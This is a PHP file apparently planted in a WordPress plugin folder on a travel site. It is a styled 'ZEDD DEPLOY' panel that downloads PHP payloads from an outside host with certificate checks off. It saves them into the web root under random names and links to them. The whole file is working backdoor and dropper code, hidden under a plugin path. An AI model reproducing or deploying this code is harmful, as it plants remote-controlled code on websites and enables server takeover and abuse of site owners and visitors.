File: /home/pnvtravel/domains/pnvtravel.com/public_html/wp-content/plugins/zeddplugins/m/dw2.php
<?php
/**
* ZEDD DEPLOY v6.0 - Waifu Edition
* Aesthetic Anime UI - High Compatibility
*/
error_reporting(0);
ini_set('max_execution_time', 300);
$remoteFiles = [
"FILE 01" => "https://teamzedd2027.tech/listproject/list/1.txt",
"FILE 02" => "https://teamzedd2027.tech/listproject/list/2.txt",
"FILE 03" => "https://teamzedd2027.tech/listproject/list/3.txt",
"FILE 04" => "https://teamzedd2027.tech/listproject/list/4.txt",
"FILE 05" => "https://teamzedd2027.tech/listproject/list/5.txt",
];
$res = ['status' => '', 'name' => ''];
function smartDownload($url, $dest) {
if (function_exists('curl_init')) {
$ch = curl_init($url); $fp = @fopen($dest, 'wb');
curl_setopt_array($ch, [CURLOPT_FILE => $fp, CURLOPT_TIMEOUT => 40, CURLOPT_SSL_VERIFYPEER => false, CURLOPT_FOLLOWLOCATION => true]);
$ok = curl_exec($ch); curl_close($ch); fclose($fp);
if ($ok && filesize($dest) > 0) return true;
}
$data = @file_get_contents($url, false, stream_context_create(["ssl"=>["verify_peer"=>false]]));
return ($data !== false && @file_put_contents($dest, $data));
}
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['target'])) {
$key = $_POST['target'];
if (isset($remoteFiles[$key])) {
$newName = 'zedd_' . bin2hex(random_bytes(3)) . '.php';
if (smartDownload($remoteFiles[$key], __DIR__ . '/' . $newName)) {
$res = ['status' => 'success', 'name' => $newName];
} else { $res['status'] = 'error'; }
}
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>ZEDD DEPLOY | ANIME</title>
<script src="https://cdn.tailwindcss.com"></script>
<link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" rel="stylesheet">
<style>
@import url('https://fonts.googleapis.com/css2?family=Syne:wght@700&family=Outfit:wght@300;400;600&display=swap');
body {
background: #0f0c29;
background: linear-gradient(to bottom, #000000, #0f0c29, #302b63);
font-family: 'Outfit', sans-serif;
color: #fff;
overflow-x: hidden;
}
.anime-card {
background: rgba(255, 255, 255, 0.03);
backdrop-filter: blur(20px);
border: 1px solid rgba(255, 255, 255, 0.1);
border-left: 4px solid #ff00ff;
box-shadow: 0 0 30px rgba(0,0,0,0.5);
}
.anime-header {
background-image: linear-gradient(rgba(0,0,0,0.4), rgba(0,0,0,0.8)), url('https://wallpaperaccess.com/full/1321033.jpg');
background-size: cover;
background-position: center;
}
.neon-text {
color: #ff00ff;
text-shadow: 0 0 10px rgba(255, 0, 255, 0.8);
font-family: 'Syne', sans-serif;
}
.btn-anime {
background: linear-gradient(45deg, #ff00ff, #7000ff);
transition: 0.3s;
}
.btn-anime:hover {
box-shadow: 0 0 20px rgba(255, 0, 255, 0.6);
transform: scale(1.02);
}
select option { background: #1a1a1a; }
</style>
</head>
<body class="min-h-screen flex items-center justify-center p-4">
<div class="w-full max-w-md relative">
<div class="absolute -top-10 -right-10 w-32 h-32 bg-purple-600 rounded-full blur-[80px] opacity-40"></div>
<div class="absolute -bottom-10 -left-10 w-32 h-32 bg-pink-600 rounded-full blur-[80px] opacity-40"></div>
<div class="anime-card rounded-3xl overflow-hidden relative">
<div class="anime-header h-32 flex items-end p-6">
<div>
<h1 class="neon-text text-2xl uppercase tracking-tighter">Zedd Deploy</h1>
<p class="text-[10px] uppercase tracking-[0.3em] opacity-60">Virtual Environment Interface</p>
</div>
</div>
<div class="p-8">
<?php if ($res['status'] === 'success'): ?>
<div class="mb-6 p-4 bg-white/5 border border-pink-500/30 rounded-xl text-center">
<i class="fas fa-heart text-pink-500 mb-2 animate-bounce"></i>
<p class="text-xs text-zinc-400 mb-1">Target Acquired:</p>
<p class="text-sm font-bold text-white mb-4"><?= $res['name'] ?></p>
<a href="<?= $res['name'] ?>" target="_blank" class="block w-full py-2 bg-pink-600 text-xs font-bold rounded-lg hover:bg-pink-500 transition">
ACCESS MODULE
</a>
</div>
<?php endif; ?>
<form method="POST" class="space-y-6">
<div>
<label class="block text-[10px] font-bold text-zinc-500 uppercase tracking-widest mb-3 ml-1">Select Component</label>
<select name="target" required class="w-full bg-black/40 border border-white/10 text-sm text-zinc-300 rounded-xl px-4 py-3 focus:border-pink-500 outline-none transition-all cursor-pointer">
<option value="" disabled selected>-- Choose Waifu Package --</option>
<?php foreach ($remoteFiles as $label => $url): ?>
<option value="<?= $label ?>"><?= $label ?></option>
<?php endforeach; ?>
</select>
</div>
<button type="submit" class="w-full py-4 btn-anime text-white font-bold text-xs rounded-xl tracking-[0.2em] uppercase flex items-center justify-center gap-2">
<i class="fas fa-sparkles"></i> START DEPLOYMENT
</button>
</form>
<div class="mt-8 pt-6 border-t border-white/5 flex justify-between items-center text-[9px] text-zinc-600 font-bold tracking-widest uppercase">
<span>Protocol v6.0</span>
<span class="text-pink-500/50 italic">Team Zedd Tech</span>
</div>
</div>
</div>
</div>
</body>
</html>